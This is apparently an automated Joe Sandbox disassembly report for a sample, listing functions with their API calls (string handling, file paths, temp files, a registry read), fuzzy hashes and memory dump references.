                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$State@Unlock@$String$Assign@?$$?erase@?$DeallocateH_prolog3_U?$char_traits@_V?$allocator@_V?$basic_string@_W@2@@std@@W@std@@
                • String ID:
                • API String ID: 1147724324-0
                • Opcode ID: 07a0bae1cf2ab7e901359a43db4629d7607e816505b47b10f6acf423bc2540ab
                • Instruction ID: 386a1b675fa288e4510c70bb163b1df544248f135d88e700ed0c15fd782b6cd4
                • Opcode Fuzzy Hash: 07a0bae1cf2ab7e901359a43db4629d7607e816505b47b10f6acf423bc2540ab
                • Instruction Fuzzy Hash: 76513DB19102189BDB60CB24CC85BDEB3B4BF48315F5444E9E609A7251DF70AEC5CF68
                Function 00C5E5AC Relevance: 10.6, APIs: 7, Instructions: 122COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C5E5B3
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,00000000,?,00000034,00C5EC7A,00000000,?,00000024,00C5C31F), ref: 00C5E5EF
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?,00000000), ref: 00C5E626
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?,00000000), ref: 00C5E669
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,00000001,00000001,?), ref: 00C5E68A
                • #140.MAPI32(?), ref: 00C5E6DE
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@State@Unlock@$#140H_prolog3_
                • String ID:
                • API String ID: 282256457-0
                • Opcode ID: 91f8821531977da2649c6daebe6f0fdd3361e8f9ddcb3a4cbb008e4f0689d642
                • Instruction ID: d370a5516dfb21aa30a5c332d95e2ae25874a1e0a7fb9ee45247976b6e32a254
                • Opcode Fuzzy Hash: 91f8821531977da2649c6daebe6f0fdd3361e8f9ddcb3a4cbb008e4f0689d642
                • Instruction Fuzzy Hash: CB417B75910229AFCB28CFA4D845AAEB7B4BF18711F10412DF912EB350DB70AE85CB64
                Function 00CAA572 Relevance: 10.6, APIs: 7, Instructions: 122COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00CAA57C
                • ??0?$CStringT@_W@Cmm@@QAE@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.RWSNDPQSKZ(?,?,00000000,00000001,000000A8,000000A8,00000000,00000001,000000A8,00CAAC66), ref: 00CAA5F8
                • ??0?$CStringT@_W@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(?,?,?,00000000,00000001,000000A8,000000A8,00000000,00000001,000000A8,00CAAC66), ref: 00CAA616
                • ?CompareNoCase@?$CStringT@_W@Cmm@@QBEHPB_W@Z.RWSNDPQSKZ(00000000,?,?,?,00000000,00000001,000000A8,000000A8,00000000), ref: 00CAA631
                • ??0?$CStringT@_W@Cmm@@QAE@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.RWSNDPQSKZ(?,?,00000001,000000FF,00000000,?,?,?,00000000,00000001,000000A8,000000A8,00000000), ref: 00CAA65B
                • ??0?$CStringT@_W@Cmm@@QAE@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.RWSNDPQSKZ(000000A8,000000A8,00000001,000000FF,?,?,00000001,000000FF,00000000,?,?,?,00000000,00000001,000000A8,000000A8), ref: 00CAA686
                • ??0?$CStringT@_W@Cmm@@QAE@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.RWSNDPQSKZ(000000A8,000000A8,00000000,00000001,000000A8,00CAAC66), ref: 00CAA5CD
                  • Part of subcall function 00C57BE9: _Deallocate.LIBCONCRT ref: 00C57BFE
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@String$??0?$$U?$char_traits@_V?$allocator@_V?$basic_string@_W@2@@std@@@W@std@@$Case@?$CompareDeallocateH_prolog3_V01@@
                • String ID:
                • API String ID: 1638533418-0
                • Opcode ID: 65fc964e03b8d4ca6054fe097fbbfd8f68515e482cba91e5baa490ea74c41595
                • Instruction ID: 614332aed185942d179c880ee557fcbd022459a52e33ae7030fb32b2e7f9604c
                • Opcode Fuzzy Hash: 65fc964e03b8d4ca6054fe097fbbfd8f68515e482cba91e5baa490ea74c41595
                • Instruction Fuzzy Hash: 65516E398042189FCF14EFA0C895ADD7774AF15325F544299EC1563282EF309B8DDFA6
                Function 00C62C10 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 121fileCOMMON
                Download Yara Rule
                APIs
                • ?cmm_fs_tmppath@@YAPB_WXZ.RWSNDPQSKZ ref: 00C62C20
                  • Part of subcall function 00C62BC0: GetTempPathW.KERNEL32(00000104,00DFFC98), ref: 00C62BF7
                • GetCurrentProcessId.KERNEL32 ref: 00C62C65
                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000001,00000080,00000000), ref: 00C62D15
                • ?Close@CFile@Cmm@@QAEXXZ.RWSNDPQSKZ ref: 00C62D2A
                • ?Close@CFile@Cmm@@QAEXXZ.RWSNDPQSKZ ref: 00C62D4D
                  • Part of subcall function 00C617B0: CloseHandle.KERNEL32 ref: 00C617BF
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Close@Cmm@@File@$?cmm_fs_tmppath@@CloseCreateCurrentFileHandlePathProcessTemp
                • String ID: %s%s%s%lx%lx.tmp
                • API String ID: 3955469823-3952344396
                • Opcode ID: df15cb4e5e40539e8bddf22d52d82e6df055f723bd6be1927ad95c95eeeb1318
                • Instruction ID: a35cd3bcd39bec7a4f275d5995d7771116c3e617afd23b6f134d0efacc31c52c
                • Opcode Fuzzy Hash: df15cb4e5e40539e8bddf22d52d82e6df055f723bd6be1927ad95c95eeeb1318
                • Instruction Fuzzy Hash: 6741CDB1A00618EFDB24DF65CC81BAE77B5EF04710F108528FA61AB390D7B09A41DBA0
                Function 00CAACA0 Relevance: 10.6, APIs: 7, Instructions: 109COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00CAACA7
                • ?GetComponents@FilePath@Cmm@@QBEXPAV?$vector@V?$CStringT@_W@Cmm@@V?$allocator@V?$CStringT@_W@Cmm@@@std@@@std@@@Z.RWSNDPQSKZ(?,00000040,00CAAC8D,?,00000000), ref: 00CAACD4
                  • Part of subcall function 00CAA8D0: __EH_prolog3_GS.LIBCMT ref: 00CAA8DA
                  • Part of subcall function 00CAA8D0: ??0?$CStringT@_W@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(?,?,?,00000090), ref: 00CAA927
                  • Part of subcall function 00CAA8D0: ?DirName@FilePath@Cmm@@QBE?AV12@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,?,?,?,?,00000090), ref: 00CAA952
                  • Part of subcall function 00CAA8D0: ??9FilePath@Cmm@@QBE_NABV01@@Z.RWSNDPQSKZ(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000090), ref: 00CAA95F
                  • Part of subcall function 00CAA8D0: ?BaseName@FilePath@Cmm@@QBE?AV12@XZ.RWSNDPQSKZ(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000090), ref: 00CAAA4D
                  • Part of subcall function 00CAA8D0: ?Compare@?$CStringT@_W@Cmm@@QBEHPB_W@Z.RWSNDPQSKZ(?,-00000004,?,00000000,?,-00000004,?,?,?,-00000004,?,00000000,?), ref: 00CAAA87
                  • Part of subcall function 00CAA8D0: ?BaseName@FilePath@Cmm@@QBE?AV12@XZ.RWSNDPQSKZ(?,?,-00000004,?,00000000,?,-00000004,?,?,?,-00000004,?,00000000,?), ref: 00CAAA97
                  • Part of subcall function 00CAA8D0: ?DirName@FilePath@Cmm@@QBE?AV12@XZ.RWSNDPQSKZ(?,-00000004,?,00000000,?,-00000004,?,?,?,-00000004,?,00000000,?), ref: 00CAAAC2
                  • Part of subcall function 00CAA8D0: ??0?$CStringT@_W@Cmm@@QAE@ABV01@I@Z.RWSNDPQSKZ(?,00000001,?,-00000004,?,00000000,?,-00000004,?,?,?,-00000004,?,00000000,?), ref: 00CAAAE1
                • ?GetComponents@FilePath@Cmm@@QBEXPAV?$vector@V?$CStringT@_W@Cmm@@V?$allocator@V?$CStringT@_W@Cmm@@@std@@@std@@@Z.RWSNDPQSKZ(?,00000040,00CAAC8D,?,00000000), ref: 00CAACDF
                  • Part of subcall function 00CAA8D0: ?rbegin@?$CStringT@_W@Cmm@@QBE?AV?$reverse_iterator@V?$_String_const_iterator@V?$_String_val@U?$_Simple_types@_W@std@@@std@@@std@@@std@@XZ.RWSNDPQSKZ(?,-00000004,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00CAA9B3
                  • Part of subcall function 00CAA8D0: ?DirName@FilePath@Cmm@@QBE?AV12@XZ.RWSNDPQSKZ(?,?,?,-00000004,?,00000000,?), ref: 00CAA9F3
                  • Part of subcall function 00CAA8D0: ?DirName@FilePath@Cmm@@QBE?AV12@XZ.RWSNDPQSKZ(?,-00000004,?,?,?,-00000004,?,00000000,?), ref: 00CAAA23
                  • Part of subcall function 00CAA8D0: ??9FilePath@Cmm@@QBE_NABV01@@Z.RWSNDPQSKZ(00000000,?,-00000004,?,?,?,-00000004,?,00000000,?), ref: 00CAAA30
                  • Part of subcall function 00CAA8D0: ??0?$CStringT@_W@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(?,?,-00000004,?,00000000,?,-00000004,?,?,?,-00000004,?,00000000,?), ref: 00CAAAFE
                • ??0?$CStringT@_W@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(?,?,00000040,00CAAC8D,?,00000000), ref: 00CAAD2F
                • ?CompareNoCase@?$CStringT@_W@Cmm@@QBEHPB_W@Z.RWSNDPQSKZ(00000001,?,?,00000040,00CAAC8D,?,00000000), ref: 00CAAD43
                  • Part of subcall function 00C57BE9: _Deallocate.LIBCONCRT ref: 00C57BFE
                • ?Append@FilePath@Cmm@@QBE?AV12@ABV?$CStringT@_W@2@@Z.RWSNDPQSKZ(?,?,?,00000040,00CAAC8D,?,00000000), ref: 00CAAD95
                • ??4FilePath@Cmm@@QAEAAV01@ABV01@@Z.RWSNDPQSKZ(00000000,?,?,?,00000040,00CAAC8D,?,00000000), ref: 00CAADA1
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$FilePath@String$V12@$Name@V01@@$??0?$$BaseCmm@@@std@@@std@@@Components@H_prolog3_V01@V?$_V?$allocator@V?$vector@$?rbegin@?$Append@Case@?$CompareCompare@?$DeallocateSimple_types@_String_const_iterator@String_val@U?$_V?$reverse_iterator@W@2@@W@std@@@std@@@std@@@std@@
                • String ID:
                • API String ID: 2001505413-0
                • Opcode ID: 7fd68e16a75543ca369c16b6b61a5e86065a876361a58539834e6e1ef092af4d
                • Instruction ID: 26bcded35ec83d55abc4fe332930098240a8c1497651f6d0d1008e9bb4532165
                • Opcode Fuzzy Hash: 7fd68e16a75543ca369c16b6b61a5e86065a876361a58539834e6e1ef092af4d
                • Instruction Fuzzy Hash: 5D41E271E002099FCF14EFA8D4949DDB7B1AF09315F54412DE855B7281DB30AA89DB62
                Function 00C5E706 Relevance: 10.6, APIs: 7, Instructions: 105COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C5E70D
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,00000000,80000000,?,?,00000000,00000024,00C5EC9F,00000000,?,?,?,?,?,?,00000000), ref: 00C5E746
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?,00000000,00D34F88,00000000,?,?,?,?,?,?,?,00000000,?,00000024,00C5C31F), ref: 00C5E792
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,00000001,80000000,00000000,00000000,?,?,?,?,?,?,?,?,00000000,?,00000024), ref: 00C5E7D1
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?,?,00D34F88,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00C5E806
                • #17.MAPI32(00000000,?,?,?,?,?,00000000,?,00000024,00C5C31F), ref: 00C5E822
                • #17.MAPI32(00000000,?,?,?,?,?,00000000,?,00000024,00C5C31F), ref: 00C5E835
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@State@Unlock@$H_prolog3_
                • String ID:
                • API String ID: 2729597131-0
                • Opcode ID: becd18e248d9b7eba1a6e75034b9a759605149fb0a6f68c23bbcb2183a51f38c
                • Instruction ID: 7f53fed31ed1112970fc7d5bb949b33177b36bb259105bc12bfa4346e05e6565
                • Opcode Fuzzy Hash: becd18e248d9b7eba1a6e75034b9a759605149fb0a6f68c23bbcb2183a51f38c
                • Instruction Fuzzy Hash: BB411875900228ABCF298F94DC48AEEB7B5FF08715F14411DE912B7290DB35AE49CB68
                Function 00CAC77A Relevance: 10.6, APIs: 7, Instructions: 99fileCOMMON
                Download Yara Rule
                APIs
                • ?IsWrittenComplete@CmmInternelMsg@Cmm@@QAE_NXZ.RWSNDPQSKZ ref: 00CAC7CB
                  • Part of subcall function 00CABD80: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?,00CAC7D0), ref: 00CABD8B
                • _InternalDeleteHelper.LIBCONCRT ref: 00CAC7E3
                • GetLastError.KERNEL32(?,?,00000001,?,00CACB28,00000000,00000000), ref: 00CAC7F2
                • ?GetToWrite@CmmInternelMsg@Cmm@@QBEIXZ.RWSNDPQSKZ(?,?), ref: 00CAC847
                • WriteFile.KERNEL32(?,?,00000000,?,?), ref: 00CAC851
                • GetLastError.KERNEL32 ref: 00CAC85B
                • ?GetToWrite@CmmInternelMsg@Cmm@@QBEIXZ.RWSNDPQSKZ ref: 00CAC86A
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$InternelMsg@$ErrorLastWrite@$Complete@DeleteFileHelperInternalState@Unlock@WriteWritten
                • String ID:
                • API String ID: 3242442747-0
                • Opcode ID: 2702efecbdda0bf06a9ee9235170584811f4286eaea3356b0040bfcadddf9e0c
                • Instruction ID: 2f607dedcab0491ed5cf12adf16cf14e772679a5a91f8bc2cae41b354c7c7724
                • Opcode Fuzzy Hash: 2702efecbdda0bf06a9ee9235170584811f4286eaea3356b0040bfcadddf9e0c
                • Instruction Fuzzy Hash: 9031C13260064BBFCB14DF65C8C59AAB7A9FF0631C7148129E916DB652D730ED24CBA0
                Function 00CDAC10 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 93registryCOMMON
                Download Yara Rule
                APIs
                • GetCurrentProcess.KERNEL32(?,9FB8111D,00DEF0D0,00000000,00000000), ref: 00CDAC97
                • IsWow64Process.KERNEL32(00000000), ref: 00CDAC9E
                • RegGetValueW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion,ProgramFilesDir,20010002,00000000,?,00000800), ref: 00CDACFD
                Strings
                • ProgramFilesDir, xrefs: 00CDACEE
                • SOFTWARE\Microsoft\Windows\CurrentVersion, xrefs: 00CDACF3
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Process$CurrentValueWow64
                • String ID: ProgramFilesDir$SOFTWARE\Microsoft\Windows\CurrentVersion
                • API String ID: 1629324724-1909746267
                • Opcode ID: 6a29b681d70182e3020895d3b89d4aec18776a5d00141c5f407afc2145b63fb1
                • Instruction ID: cc4a65a771159cafe9f9f27216b768f34408ae2df5327d16ef0e0b3793574097
                • Opcode Fuzzy Hash: 6a29b681d70182e3020895d3b89d4aec18776a5d00141c5f407afc2145b63fb1
                • Instruction Fuzzy Hash: 54313E71900358AADB20DB65DC49BAAB7B8FF04714F0081AAE955D3380DF745A49CFA5
                Function 00CBEEC4 Relevance: 10.6, APIs: 7, Instructions: 88COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00CBEECE
                • ??0LogFilterItem_s@logging@@QAE@XZ.RWSNDPQSKZ(?,?,00000080,00CBF405,?,?,?), ref: 00CBEF1F
                • ?Assign@?$CStringT@_W@Cmm@@QAEXPB_W@Z.RWSNDPQSKZ(?,?,?,00000080,00CBF405,?,?,?), ref: 00CBEF55
                  • Part of subcall function 00CBF839: _Deallocate.LIBCONCRT ref: 00CBF8FE
                • ?IsValid@LogFilterItem_s@logging@@QBE_NXZ.RWSNDPQSKZ(?,?,00000080,00CBF405,?,?,?), ref: 00CBEF68
                • ??0LogFilterItem_s@logging@@QAE@ABU01@@Z.RWSNDPQSKZ(00000002,?,?,00000080,00CBF405,?,?,?), ref: 00CBEF75
                • ??1LogFilterItem_s@logging@@QAE@XZ.RWSNDPQSKZ(?,?,00000002,?,?,00000080,00CBF405,?,?,?), ref: 00CBEFC7
                • ??4LogFilterItem_s@logging@@QAEAAU01@ABU01@@Z.RWSNDPQSKZ(?,?,?,00000080,00CBF405,?,?,?), ref: 00CBEFE0
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: FilterItem_s@logging@@$U01@@$Assign@?$Cmm@@DeallocateH_prolog3_StringU01@Valid@
                • String ID:
                • API String ID: 2045341091-0
                • Opcode ID: 4f43f07ad6e1dd832f40a85c0a6f99b09aed679d33b682d5eda170498e5ea2cc
                • Instruction ID: a56d0407c239c7022b9cf8775324932d123858de9d7248968b40cdccbe8be2bf
                • Opcode Fuzzy Hash: 4f43f07ad6e1dd832f40a85c0a6f99b09aed679d33b682d5eda170498e5ea2cc
                • Instruction Fuzzy Hash: ED4108B190464AEFCB54DF68C9816DCFBF0BF58700F14816AE419E7341EB30AA55DB90
                Function 00CAADE0 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00CAADE7
                • ??0?$CStringT@_W@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(?,00000008,00CAA957,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00CAADFA
                • ?StripTrailingSeparatorsInternal@FilePath@Cmm@@AAEXXZ.RWSNDPQSKZ(?,00000008,00CAA957,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00CAAE0B
                  • Part of subcall function 00CAB760: ?IsSeparator@FilePath@Cmm@@SA_N_W@Z.RWSNDPQSKZ(?,?,?,00000000,?,?,00CAAE10,?,00000008,00CAA957,?), ref: 00CAB78F
                  • Part of subcall function 00CAB760: ?IsSeparator@FilePath@Cmm@@SA_N_W@Z.RWSNDPQSKZ(?,?,?,00000000,?,?,00CAAE10,?,00000008,00CAA957,?), ref: 00CAB7B8
                • ?find_last_of@?$CStringT@_W@Cmm@@QBEIPB_WII@Z.RWSNDPQSKZ(?,000000FF,00000002,?,00000008,00CAA957,?), ref: 00CAAE27
                • ?StripTrailingSeparatorsInternal@FilePath@Cmm@@AAEXXZ.RWSNDPQSKZ(?,00000008,00CAA957,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00CAAE89
                • ?Assign@?$CStringT@_W@Cmm@@QAEXPB_W@Z.RWSNDPQSKZ(?,?,00000008,00CAA957,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00CAAE9B
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$FilePath@$String$Internal@Separator@SeparatorsStripTrailing$??0?$?find_last_of@?$Assign@?$H_prolog3V01@@
                • String ID:
                • API String ID: 2295395418-0
                • Opcode ID: 17efde51b601715c02795f562a13a82df7b5e39fda8488620fda82bee4be148b
                • Instruction ID: 472f0d97b88e09a8c2a9439d2e212402c4fafb7269756cc9ef79673c954a5086
                • Opcode Fuzzy Hash: 17efde51b601715c02795f562a13a82df7b5e39fda8488620fda82bee4be148b
                • Instruction Fuzzy Hash: 2B210A757007066BCF24DF58D89277F72A26B56B58F50011CF512AB2C2DBB04F54D366
                Function 00C627D0 Relevance: 10.6, APIs: 7, Instructions: 70fileCOMMON
